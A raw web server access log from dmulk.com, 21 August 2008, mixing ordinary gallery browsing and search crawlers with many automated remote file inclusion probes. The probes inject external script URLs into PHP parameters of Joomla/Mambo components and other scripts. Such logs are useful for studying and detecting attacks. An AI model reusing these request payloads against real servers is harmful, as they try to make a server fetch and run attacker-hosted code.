74.53.240.146 - - [21/Aug/2008:09:00:10 -0700] "GET /logs/access_080723.log//index.php?INCLUDE_FOLDER=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:00:11 -0700] "GET //index.php?INCLUDE_FOLDER=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 200 9915 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:00:11 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.146.145.67 - - [21/Aug/2008:09:00:19 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.146.145.67 - - [21/Aug/2008:09:00:19 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.146.145.67 - - [21/Aug/2008:09:00:19 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:00:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:00:21 -0700] "GET //skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:00:39 -0700] "GET /bikes/dteel/SeaSTOC07/?D=A HTTP/1.0" 200 973 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:00:42 -0700] "GET /logs/access_080725.log//index.php?INCLUDE_FOLDER=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.146.145.67 - - [21/Aug/2008:09:00:48 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.146.145.67 - - [21/Aug/2008:09:00:48 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.146.145.67 - - [21/Aug/2008:09:01:05 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://borneo.siteburg.com/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:09:01:38 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_galleria&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:15 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:02:18 -0700] "GET /logs/config.php?path_to_root=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:20 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:23 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:02:36 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:02:36 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:37 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:02:37 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.84.19.133 - - [21/Aug/2008:09:02:41 -0700] "GET /logs/access_080809.log//[Script]/layout/default/params.php?gConf[dir][layouts]=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.108.192 - - [21/Aug/2008:09:03:19 -0700] "GET /tmp/sess_629fcbb718d189bdffb1383e75cf6ed0 HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.58.137.81 - - [21/Aug/2008:09:03:29 -0700] "GET /logs/access_080213.log/index.php?func=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:03:35 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:09:03:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:03:52 -0700] "GET /logs/access_080401.log/main.php?appserv_root=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.84.19.133 - - [21/Aug/2008:09:03:54 -0700] "GET /logs/access_080812.log//[Script]/layout/default/params.php?gConf[dir][layouts]=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:03:58 -0700] "GET /main.php?appserv_root=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:04:04 -0700] "GET /logs/main.php?appserv_root=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:09:04:10 -0700] "GET /logs/access_080619.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.67.108.12 - - [21/Aug/2008:09:04:12 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_galleria&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
77.88.192.8 - - [21/Aug/2008:09:04:24 -0700] "GET /logs/access_080726.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:05:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:05:23 -0700] "GET //skin/zero_vote/error.php?dir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:40 -0700] "GET / HTTP/1.1" 200 9809 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:40 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:41 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:41 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:41 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:41 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:42 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:44 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&485 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:05:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-125_0.jpg HTTP/1.1" 200 575385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
85.10.136.249 - - [21/Aug/2008:09:05:54 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:05:55 -0700] "GET /bikes/dteel/2008_07_03/?M=A HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:05 -0700] "GET / HTTP/1.1" 200 9809 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:06 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&718 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:10 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:10 -0700] "GET /blog/index.php/page/2/ HTTP/1.1" 200 10988 "http://dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-273.jpg HTTP/1.1" 200 261409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:14 -0700] "GET /blog/wp-includes/images/smilies/icon_smile.gif HTTP/1.1" 200 174 "http://dmulk.com/blog/page/2/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:14 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=5&526 HTTP/1.1" 200 3451 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:14 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&69 HTTP/1.1" 200 185990 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:16 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1016.jpg HTTP/1.1" 200 304849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.249.67.135 - - [21/Aug/2008:09:06:18 -0700] "GET /blog/index.php/page/2/?show=gallery&pageid=169&nggpage=3 HTTP/1.1" 200 9950 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-064.jpg HTTP/1.1" 200 272327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:06:26 -0700] "GET /logs/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:06:26 -0700] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.210.48.162 - - [21/Aug/2008:09:06:30 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1008.jpg HTTP/1.1" 200 332259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
209.62.80.134 - - [21/Aug/2008:09:07:27 -0700] "GET /logs/bughttp://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:09:07:28 -0700] "GET /logs/access_080410.log//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:09:07:28 -0700] "GET //path/components/com_facileforms/facileforms.frame.php?ff_compath=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.211.35.160 - - [21/Aug/2008:09:07:29 -0700] "GET /logs//path/components/com_facileforms/facileforms.frame.php?ff_compath=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.80.134 - - [21/Aug/2008:09:07:38 -0700] "GET /bughttp://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:07:46 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:07:46 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:07:46 -0700] "GET /logs/access_080408.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:07:46 -0700] "GET /logs/access_080810.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:07:54 -0700] "GET /logs/access_080131.log%20/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:07:54 -0700] "GET /logs/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:07:54 -0700] "GET /errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:09:08:03 -0700] "GET /logs//?path%5Bdocroot%5D=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 200 61575 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:09:08:05 -0700] "GET //?path%5Bdocroot%5D=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 200 9908 "-" "libwww-perl/5.810" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:08:41 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:08:41 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:08:41 -0700] "GET /logs/access_080408.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:08:41 -0700] "GET /logs/access_080810.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:08:48 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:08:49 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:09:09:11 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:09:09:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 9880 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:09:09:13 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:17 -0700] "GET /logs/access_080127.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:17 -0700] "GET /vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:17 -0700] "GET /logs/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:18 -0700] "GET /logs/access_080127.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:18 -0700] "GET /vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:18 -0700] "GET /logs/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:21 -0700] "GET /logs/access_080219.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:09:09:25 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.135.41.76 - - [21/Aug/2008:09:09:25 -0700] "GET /logs/access_080625.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:09:27 -0700] "GET /logs/access_080219.log/vwar/g4//convert/mvcw.php?step=1&vwar_root=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:09:29 -0700] "GET /logs/galery.php?start=0&kategoria=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:09:39 -0700] "GET /logs/access_080213.log/galery.php?start=0&kategoria=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
85.252.40.100 - - [21/Aug/2008:09:09:39 -0700] "GET /logs/access_080201.log/galery.php?start=0&kategoria=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:10:24 -0700] "GET /bikes/dteel/2008_02_07/?N=D HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
